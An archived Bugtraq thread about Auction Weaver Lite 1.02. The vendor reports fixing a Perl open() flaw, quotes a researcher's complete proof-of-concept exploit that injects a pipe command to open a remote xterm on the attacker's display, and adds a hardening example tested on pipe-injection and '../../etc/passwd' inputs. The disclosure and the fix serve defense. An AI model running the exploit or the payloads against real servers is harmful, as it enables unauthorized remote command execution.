[16532] in bugtraq
Re: More problems with Auction Weaver & CGI Script Center.
daemon@ATHENA.MIT.EDU (CGI Script Center Support)
Mon Sep 4 00:06:38 2000
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <000701c01538$5ee212c0$2a9f0a18@msnv1.occa.home.com>
Date: Sat, 2 Sep 2000 16:49:02 -0700
Reply-To: support@cgiscriptcenter.com
From: CGI Script Center Support <support@cgiscriptcenter.com>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <000d01c012d5$a2f568a0$0cb1b3d0@Jennifer>
Auction Weaver Lite 1.02 was opening files to be read without using the READ
"<" command, which allowed outside commands to be executed on UNIX platforms
using Xterm.
All files being opened for reading have now been updated.
> I have only been able to check the below exploit on the shareware
> version, but I strongly believe that the PRO version is exploitable
> as well.
No Professional version is yet available.
The below exploit should no longer be valid.
CGI Script Center Support
support@cgiscriptcenter.com
> -----Original Message-----
> From: teleh0r - [mailto:teleh0r@doglover.com]
> Sent: Wednesday, August 30, 2000 10:21 AM
> To: BUGTRAQ@SECURITYFOCUS.COM
> Cc: support@cgiscriptcenter.com
> Subject: More problems with Auction Weaver & CGI Script Center.
>
>
> CGI Script Center recently upgraded Auction Weaver 1.0 to
> 1.2 due to a security issue found and reported by Meliksah Ozoral.
>
> Today, I decided to take a look at Auction Weaver just to check
> if the issue and possible other security problems were now fixed.
>
> I guessed they had taken a *close* look at their scripts, considering
> the problems reported lately - but I guessed wrong...
>
> I have only been able to check the below exploit on the shareware
> version, but I strongly believe that the PRO version is exploitable
> as well.
>
> Or perhaps only those who pay get secure scripts? Maybe that would
> be a successful business policy? ;)
>
> CGI Script Center, _please_ contact me if you want help securing your
> scripts.
>
> Sincerely yours,
> teleh0r
>
> 8<---auctionweaver-exploit.pl------------------------------------
>
>
> #!/usr/bin/perl -w
>
> ## Auction Weaver 1.02 / Only confirmed with LITE
> ## - Proof of Concept exploit -
> ##
> ## CGI Script Center have just released an update
> ## of Auction Weaver due to security reasons - I
> ## suggest that you spend some more time securing
> ## it, and the other scripts - It is really needed.
> ##
> ## This exploit will spawn a xterm from $target
> ## to $attacker.
> ##
> ## This exploit will not work on hosts running
> ## Auction Weaver on NT, due to the xterm call.
> ##
> ## CGI Script Center, please contact me if you need
> ## help with securing your scripts...
> ##
> ## teleh0r@doglover.com / anno 2000
> ## http://teleh0r.cjb.net
>
> use strict; use Socket;
>
> if (@ARGV < 3) {
> print("Usage: $0 <target> <attacker> <dpy>\n");
> exit(1);
> }
>
> my($target,$attacker,$dpy,$length,$cgicode,
> $agent,$sploit,$iaddr,$paddr,$proto);
>
> ($target,$attacker,$dpy) = @ARGV;
>
> if ($dpy !~ /\d/) {
> print("dpy must be a number, probably 0\n");
> exit(1);
> }
>
> print("\nRemote host: $target\n");
> print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n");
> print("Command: xterm -ut -display $attacker:$dpy\n\n");
>
> system("xhost + $target");
>
> $length = 138 + length($attacker.$dpy);
>
> $cgicode =
> "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1&catdir".
> "=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem=1&sbut".
> "ton=BID";
>
> $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";
>
> # The path to auctionweaver.pl may of course need to be changed.
>
> $sploit=
> "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0
> Connection: close
> User-Agent: $agent
> Host: $target
> Content-type: application/x-www-form-urlencoded
> Content-length: $length
>
> $cgicode";
>
> $iaddr = inet_aton($target) || die("Error: $!\n");
> $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
> $proto = getprotobyname('tcp') || die("Error: $!\n");
>
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
> close(SOCKET);
>
> sleep(3);
> system("xhost - $target");
> print("\nAll done - hopefully you got the flying xterm!\n");
> exit(0)
>
>
> -----------------------------------------------------------------
>
>
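The vendor's reply above describes the root cause and the fix in one sentence: files were opened with a two-argument open() and no explicit read mode, so a form value beginning and ending with "|" was treated by Perl as a pipe open and executed as a command. The script below is an added illustration written for this archive page, not code from Auction Weaver or from CGI Script Center. It assumes a constructed temporary data directory and a constructed sample file; the safe_open_read() function and its file-name allow-list are this example's own, not the vendor's implementation.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Constructed demo directory standing in for the auction data directory
# (an assumption for this example, not Auction Weaver's real layout).
my $data_dir = tempdir(CLEANUP => 1);
{
    open(my $out, '>', File::Spec->catfile($data_dir, 'item1.txt'))
        or die "cannot create sample file: $!";
    print {$out} "Sample auction item\n";   # constructed content
    close($out);
}

# The vulnerable pattern, as the vendor describes it: a two-argument
# open() takes the mode from the string itself, so a form value such as
# "|xterm -display host:0|" is a pipe open and runs that command.
# Shown only as a comment; it is never executed in this example.
#
#     open(FH, $fromfile);        # $fromfile comes straight from the form
#
# Hardened version: allow-list the file name and use three-argument open
# with an explicit '<' mode, so the value can only ever name a file
# inside the data directory.
sub safe_open_read {
    my ($dir, $fromfile) = @_;
    # Plain file names only: no leading dot, no '/', '|', spaces or '..'.
    return (undef, 'rejected: not a plain file name')
        unless defined $fromfile
            && $fromfile =~ /\A[A-Za-z0-9_-][A-Za-z0-9_.-]{0,63}\z/;
    my $path = File::Spec->catfile($dir, $fromfile);
    open(my $fh, '<', $path)
        or return (undef, "rejected: cannot open $path: $!");
    return ($fh, undef);
}

# Constructed inputs: a legitimate item file, the pipe-open payload shape
# from the advisory, and a directory-traversal attempt.
for my $input ('item1.txt', '|xterm -display attacker.example:0|', '../../etc/passwd') {
    my ($fh, $err) = safe_open_read($data_dir, $input);
    if ($fh) {
        my $first = <$fh>;
        close($fh);
        printf "%-38s -> opened, first line: %s", $input, $first;
    } else {
        printf "%-38s -> %s\n", $input, $err;
    }
}
```

The allow-list is the part that does the work: even with three-argument open, a name like "../../etc/passwd" would still read a file outside the data directory, so validating the name is a separate check from fixing the open mode. When auditing a Perl CGI for this class of bug, grep for open() calls whose second argument is a variable rather than a literal mode string.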